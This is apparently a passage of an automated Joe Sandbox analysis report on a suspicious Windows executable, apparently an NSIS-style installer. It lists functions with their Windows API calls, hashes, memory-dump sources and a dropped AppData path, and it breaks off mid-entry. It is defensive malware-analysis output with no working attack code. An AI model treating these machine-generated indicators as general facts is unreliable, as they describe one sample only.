                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                              • Instruction ID: 3f4f51c5761301f24834a255f16e5381e59d2a113ab40b24d84d285923e9a67b
                                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                              • Instruction Fuzzy Hash: 47D0173604020DBBEF119F90ED01FAB3B6DAB08314F014826FE16A80A2D776D530AB68
                                                              Function 0040424C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                              • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                              • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                              • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                              Function 0040332B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                              Function 004058AA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShellExecuteExW.SHELL32(?), ref: 004058B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ExecuteShell
                                                              • String ID:
                                                              • API String ID: 587946157-0
                                                              • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                              • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                              • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                              • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                              Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,759223A0), ref: 00405341
                                                                • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                • Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                • Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                • Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
                                                                • Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740
                                                                • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                              • String ID:
                                                              • API String ID: 2972824698-0
                                                              • Opcode ID: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
                                                              • Instruction ID: 0c3abe8747980e4b1c062509ec269ea7acbc1ace6387f940061889d1bd78c20b
                                                              • Opcode Fuzzy Hash: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
                                                              • Instruction Fuzzy Hash: F5F09032905115DBCB20FFA19D848DE62A49F01368B25057FF102F61D1C77C0E459AAE
                                                              Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: AllocGlobal
                                                              • String ID:
                                                              • API String ID: 3761449716-0
                                                              • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                              • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                              • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                              • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

                                                              Non-executed Functions

                                                              Function 00405425 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 00405483
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405492
                                                              • GetClientRect.USER32(?,?), ref: 004054CF
                                                              • GetSystemMetrics.USER32(00000002), ref: 004054D6
                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
                                                              • ShowWindow.USER32(?,00000008), ref: 00405572
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405593
                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
                                                              • GetDlgItem.USER32(?,000003F8), ref: 004054A1
                                                                • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004055E5
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
                                                              • CloseHandle.KERNEL32(00000000), ref: 004055FA
                                                              • ShowWindow.USER32(00000000), ref: 0040561E
                                                              • ShowWindow.USER32(?,00000008), ref: 00405623
                                                              • ShowWindow.USER32(00000008), ref: 0040566D
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
                                                              • CreatePopupMenu.USER32 ref: 004056B2
                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
                                                              • GetWindowRect.USER32(?,?), ref: 004056E6
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
                                                              • OpenClipboard.USER32(00000000), ref: 00405747
                                                              • EmptyClipboard.USER32 ref: 0040574D
                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
                                                              • GlobalLock.KERNEL32(00000000), ref: 00405763
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405797
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
                                                              • CloseClipboard.USER32 ref: 004057A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                              • String ID: {
                                                              • API String ID: 590372296-366298937
                                                              • Opcode ID: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                              • Instruction ID: 2f82927f57e7d4f45bca6e23eab998b55dded590160266c2ba262d9988700e91
                                                              • Opcode Fuzzy Hash: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                              • Instruction Fuzzy Hash: 37B16970800608BFDB119FA0DD89AAE7B79FB48355F00403AFA45B61A0CB759E51DF68
                                                              Function 004046E6 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404735
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0040475F
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404810
                                                              • CoTaskMemFree.OLE32(00000000), ref: 0040481B
                                                              • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 0040484D
                                                              • lstrcatW.KERNEL32(?,Call), ref: 00404859
                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040486B
                                                                • Part of subcall function 004058C8: GetDlgItemTextW.USER32(?,?,00000400,004048A2), ref: 004058DB
                                                                • Part of subcall function 00406516: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                                • Part of subcall function 00406516: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                                • Part of subcall function 00406516: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                                • Part of subcall function 00406516: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                              • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040492E
                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                                • Part of subcall function 00404AA2: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                                • Part of subcall function 00404AA2: wsprintfW.USER32 ref: 00404B4C
                                                                • Part of subcall function 00404AA2: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: A$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call
                                                              • API String ID: 2624150263-2308679604
                                                              • Opcode ID: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                              • Instruction ID: b9cd804fa769b9c0a994065299bacf789a546679ae48146ccc486c737bfd155f
                                                              • Opcode Fuzzy Hash: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                              • Instruction Fuzzy Hash: CBA175F1A00209ABDB11AFA5CD41AAFB7B8EF84354F10847BF601B62D1D77C99418B6D
                                                              Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                              • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                              • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                              • GlobalFree.KERNEL32(?), ref: 10001D83
                                                              • GlobalFree.KERNEL32(?), ref: 10001D88
                                                              • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                              • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                              • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$lstrcpy$Alloc
                                                              • String ID:
                                                              • API String ID: 4227406936-0
                                                              • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                              • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                              • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                              • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                              Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                              Strings
                                                              • C:\Users\user\AppData\Roaming\pechay\transskribere\jon, xrefs: 004021BD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance
                                                              • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon
                                                              • API String ID: 542301482-4074717334
                                                              • Opcode ID: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                              • Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
                                                              • Opcode Fuzzy Hash: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                              • Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                              Function 004072B4 Relevance: 2.8, Strings: 2, Instructions: 300COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: p!C$p!C
                                                              • API String ID: 0-3125587631
                                                              • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                              • Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
                                                              • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                              • Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95
                                                              Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID:
                                                              • API String ID: 1974802433-0
                                                              • Opcode ID: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                              • Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
                                                              • Opcode Fuzzy Hash: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                              • Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A
                                                              Function 00406ADD Relevance: .3, Instructions: 334COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                              • Instruction ID: c2d777d08f91faa28cc29f4af1d325e94f95b1c5ec16d27d51274fd7273dd8ba
